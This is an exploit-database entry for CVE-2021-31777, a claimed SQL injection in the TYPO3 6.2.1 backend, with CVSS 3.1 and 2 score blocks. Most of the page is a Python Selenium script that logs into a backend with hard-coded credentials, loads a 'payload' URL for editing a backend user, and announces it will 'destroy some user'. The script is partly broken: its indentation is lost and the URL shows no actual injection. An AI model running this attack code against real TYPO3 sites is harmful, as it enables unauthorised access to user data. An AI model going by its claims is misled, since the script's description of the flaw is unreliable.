Zdt1337DAY-ID-36182TYPO3 6.2.1 SQL Injection Exploit
4.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Vendor: https://typo3.org/
# Link: https://get.typo3.org/version/6.2.1
# CVE: CVE-2021-31777
# Proof: https://streamable.com/8v7v4i
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-31777
from selenium import webdriver
import time
import os, sys
# Vendor: https://typo3.org/
website_link="http://192.168.1.3/typo3_src-6.2.1/typo3/index.php"
# enter your login username
username="nu11secur1ty"
# enter your login password
password="password"
#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="p_field"
#enter the element for submit button
element_for_submit="commandLI"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
time.sleep(3)
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit vulnerability MySQL user table by using backend.php vulnerability
time.sleep(3)
# Payload link
browser.get(("
http://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#"))
print("The payload is deployed it is time to destroy some user...\n")
os.system('pause')
browser.close()
except Exception:
#### This exception is if the user is not found in the database or
something is wrong.
print("Sorry, but this user who you searching for is destroyed by using of
MySQL vulnerability in backend.php...")
---------------------------------
# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on
backend.php
# Date: 05.02.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://typo3.org/
# Software Link: https://get.typo3.org/version/6.2.1
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777
# 0day.today [2021-11-04] #Related
4.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N